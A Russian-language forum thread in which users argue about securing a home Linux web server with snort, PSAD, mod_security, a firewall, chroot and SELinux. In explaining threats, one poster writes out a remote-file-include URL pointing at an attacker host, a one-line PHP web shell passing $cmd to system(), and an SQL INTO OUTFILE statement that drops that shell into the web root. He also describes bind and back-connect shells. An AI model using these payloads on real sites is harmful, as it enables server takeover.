Взлом компьютера

[Lundil]

офтоп
А давайте на венду потавим виртуальную машину, в короц будит линукс. И в линуксе протестируем линуксовую виртуальную машину, поставив на нее Венду?...

[Костик]

Оооо Леонид Вы решили убить мой мозг ? неговаря уже о том железе на котором собрались это тестировать

[Sicness]

офтоп
А давайте на венду потавим виртуальную машину, в короц будит линукс. И в линуксе протестируем линуксовую виртуальную машину, поставив на нее Венду?...

Нет смысла даже рассматривать, так как проект расчитывается на большенство пользователей ФОСа, котрые как факт сидят на windows и лишних компьютеров не имеют. Заканчиваем офтоп или создаём новую тему.

Разработка уже в процессе.

[zk]

Разработка уже в процессе.

Надеюсь что руткитов там не будет

А вообще радует что кто-то что-то делает =)

[Sicness]

Надеюсь что руткитов там не будет

+) На карту поставлена честь.

В общем, базовой разработкой занимается DPX-Infinity. Как он закончит, планирую
Установить систему обнаружения вторжения (snort), интегрированная в webadmin
Настроить фаерволл от непредвиденных шеллов
Повозится с mod_security

[Lundil]

Надеюсь что руткитов там не будет

+) На карту поставлена честь.

В общем, базовой разработкой занимается DPX-Infinity. Как он закончит, планирую
Установить систему обнаружения вторжения (snort), интегрированная в webadmin
Настроить фаерволл от непредвиденных шеллов
Повозится с mod_security

В общем будущая разработка полностью DPX-Infinity

Насколько помню snort работает через фаервол динамически добавляя и удаляя туда строки правил
пардон, перепутал с PSAD.
DPX-Infinity, но из интереса посмотри и на PSAD. Настройки проще.

"Фаервол от непредвиденных шеллов" - че за фигня?
Повозитьс с mod_security опть же DPX-Infinity
DPX-Infinity, еще с chroot повозись для apache, тжеловато для первого раза, но оно того стоит

А где сдесь ваша роль Sicness? (или просто честь)))

[Sicness]

В общем будущая разработка полностью DPX-Infinity

Насколько помню snort работает через фаервол динамически добавляя и удаляя туда строки правил
пардон, перепутал с PSAD.
DPX-Infinity, но из интереса посмотри и на PSAD. Настройки проще.

"Фаервол от непредвиденных шеллов" - че за фигня?
Повозитьс с mod_security опть же DPX-Infinity
DPX-Infinity, еще с chroot повозись для apache, тжеловато для первого раза, но оно того стоит

А где сдесь ваша роль Sicness? (или просто честь)))

Боже мой, какой Вы Жук, Lundil Баба с возу - кобыле легче. ) Не нужна помощь, ну и хорошо. ) Но я думаю это не Ваше дело.

Не слышал о PSAD, но snort считается лучшим и используется даже Агентством Нац. Безопасности США. + Настраивать почти ничего не придётся и если придётся, то snopr будет интегрирован в webmin ) Он умеет всё что укажешь благодаря встроенному языку сценариев. Аналитические системы работают в основном с snort и не охотно поддерживают другие NIDS. // А может NIDS вообще не нужен, mod_security наверное и достаточно, там же только web сервер.

> "Фаервол от непредвиденных шеллов" - че за фигня?
А знаете такую классную функцию на популярных web-шеллах типа "открыть shell (/bin/sh) на определенном порту" или back-connect на порт злоумышленика. От всех этих неприятностей и другого неприятного и используется фаерволл.

> Повозитьс с mod_security опть же DPX-Infinity
Ну хорошо, он же Apache делает.

> DPX-Infinity, еще с chroot повозись для apache, тжеловато для первого раза, но оно того стоит
Для чего же chroot если там реально кроме web сервера ничего нет )

[Lundil]

Боже мой, какой Вы Жук, Lundil Баба с возу - кобыле легче. ) Не нужна помощь, ну и хорошо. ) Но я думаю это не Ваше дело.

ню-ню... знаю я таких балтологов.

Не слышал о PSAD, но snort считается лучшим и используется даже Агентством Нац. Безопасности США. + Настраивать почти ничего не придётся и если придётся, то snopr будет интегрирован в webmin ) Он умеет всё что укажешь благодаря встроенному языку сценариев. Аналитические системы работают в основном с snort и не охотно поддерживают другие NIDS. // А может NIDS вообще не нужен, mod_security наверное и достаточно, там же только web сервер.

а теперь головой думаем, для чего тот и другой копонент и заменяют ли они друг друга.

> "Фаервол от непредвиденных шеллов" - че за фигня?
А знаете такую классную функцию на популярных web-шеллах типа "открыть shell (/bin/sh) на определенном порту" или back-connect на порт злоумышленика. От всех этих неприятностей и другого неприятного и используется фаерволл.

а какой идиот будет использовать веб-шеллы на своих серверах? (это отнасится и к webmin которым вы собираетесь пльзоваться для настройки, и видимо держать его постоянно запущенным..)))))
и пожалуйста покажите мне команду как открыть sh на порту.

> Повозитьс с mod_security опть же DPX-Infinity
Ну хорошо, он же Apache делает.

а вы, уважаемый говорун - ничего не делаете.

> DPX-Infinity, еще с chroot повозись для apache, тжеловато для первого раза, но оно того стоит
Для чего же chroot если там реально кроме web сервера ничего нет )

а теперь еще раз думаем головой (а не... ж..урналами), что для чего, и взаимозаменяемые ли это вещи?

Удачи в размышлениях.

[Sicness]

> а теперь головой думаем, для чего тот и другой копонент и заменяют ли они друг друга.
Хорошо настроенный mod_security предотвратит атаки на web, а кроме него ничего открытого не будет. Так?

> а какой идиот будет использовать веб-шеллы на своих серверах?
Вам подскажет вот такая воображаемая ситуация:
http://www.mysite.ru/page=http://hacker.ru/myshell.txt
Это, конечно, банальный php-include и встречается редко, но я встречал и такой. Не встречали ли как в картинку заливают php код с if (isset($cmd)) system($cmd); ?
Или вот еще:
SELECT '<? if (isset($cmd)) system($cmd); ?> INTO OUTFILE '../../../../../../../home/mysite/www/myshell' ? (точно синтаксис не помню)
Кто сказал что использовать веб шеллы на своих серверах?

> и пожалуйста покажите мне команду как открыть sh на порту.
Эх... всему Вас надо учить ) Шутка. Под рукой нет у меня web шелла r57, кто захочет найдет увидит. Принцип такой: прямо в коде шелла залит код махенькой утилиты, которая открывает на заданом порту /bin/sh. Скрипт на Perl, он копирует этот шелл-код в /tmp/ и от прав учетной записи веб-сервера запускает его. Жаль под рукой нет примера. Вы правда о таком даже не слышали? Только не спрашивайте как бинарник можно представить в виде текста в скрипте

> а вы, уважаемый говорун - ничего не делаете.
Не понимаю в чем упрёк ко мне. Если ничего делать не буду, то не буду. И что теперь? Вот вцепились...

> DPX-Infinity, еще с chroot повозись для apache, тжеловато для первого раза, но оно того стоит
Для чего же chroot если там реально кроме web сервера ничего нет )

>а теперь еще раз думаем головой (а не... ж..урналами), что для чего, и взаимозаменяемые ли это вещи?

Если речь идёт о chroot то эта утилита позволяет виртуально сместить корень файловой системы примерно так:

/
+bin
+sbin
+home
++vasiliy
++chroot //Новый корень ФС для Apache, за который он не выйдет
+++bin
+++sbin
+++usr
++++local/apache
+++var
+usr
+var
...

Не понял Вашего последнего вопроса, но, если подумать и додумать его, то... Смысл прятать веб сервер в chroot если кроме веб сервера там ничего нет? Его неотчего отделять за такой стенкой.

[Lundil]

видать размышления не удались.

объясню
1. кроме веб-сервера там будет открыт как минимум ssh
2. еще вы там веб-мин запустить хотите порт у него 10000 (или 1000 не помню, не пользовался никогда)
3. если вы все хотите закрыть mod_security то нафига фаервол?
4. картинки при заливке проверяются на тип и никакой ПХП код в нормальной картинке не спрячешь, к тому же они используются только в параметре img src и ни как более. Если сайт пытаетс выполнить картинку как код - криворукость программиста.
5. chroot теперь думаю имеет смысл в свете 1 и 2, к тому же есть много файлов к которым желательно доступ закрыть даже из скриптов на сервере. /etc/passwd /etc/sysconfig/iptables.... соответсвенно их вообще не должно быть в файловой системе для apache (/etc/passwd нужно оставить только 1 строчку про apache)
6. Да и объясните мне как вы хотите защититься от выполнения произвольных скриптов на сервере ФАЕРВОЛОМ?????????? не путаете ли вы его со встроенной системой SELinux (DPX-Infinity и на эту вещь обрати внимание)???????
7. все примеры, описаные вами выше, решаются втавлением рук програмиста из жопы к плечам. Потенциально опасные команды должны защищаться и перепровертьс тщательно. Но мы же говорим про личный сервер "домашнего использования", а не хостинг. Так что защиту от себя же ставить глупо
8. PSAD - защита от сканирования. Представим ситуацию кто-то запускает nmap xspider... и чтобы заблокировать поток данных от них как раз и будет работать psad. Нушно/ненужно - не навязываю, просто как альтернатива snort

так что еще подумайте уважаемый Sicness....